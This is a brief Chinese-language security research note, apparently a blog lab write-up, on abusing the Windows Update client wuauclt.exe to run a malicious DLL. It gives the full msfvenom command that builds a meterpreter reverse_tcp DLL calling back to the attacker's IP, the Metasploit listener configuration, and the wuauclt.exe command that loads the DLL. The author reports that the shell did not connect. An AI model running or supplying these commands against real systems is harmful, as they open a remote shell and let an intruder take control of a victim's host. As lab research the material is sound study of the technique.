返回首页
EN
H7 / SECURITY RESEARCH NOTES

滥用WindowsUpdate程序执行恶意DLL获取主机权限

环境说明

IPHOSTNAMENOTE
172.16.106.67kali_dqy攻击者主机
10.10.10.88win10_dqy受害者主机

前言

攻击过程

MSF制作恶意DLL

  • 通过MSF生成恶意的DLL
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.106.67 LPORT=2335 -f dll > attack_demo.dll
  • 配置MSF监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2335
exploit # 如下图:

wuauclt执行恶意DLL

wuauclt.exe /UpdateDeploymentProvider e:\payload\attack_demo.dll /RunHandlerComServer

  • 如下图,额,并没有上线,说明哪里出了一点问题,后续研究一下问题出在哪里。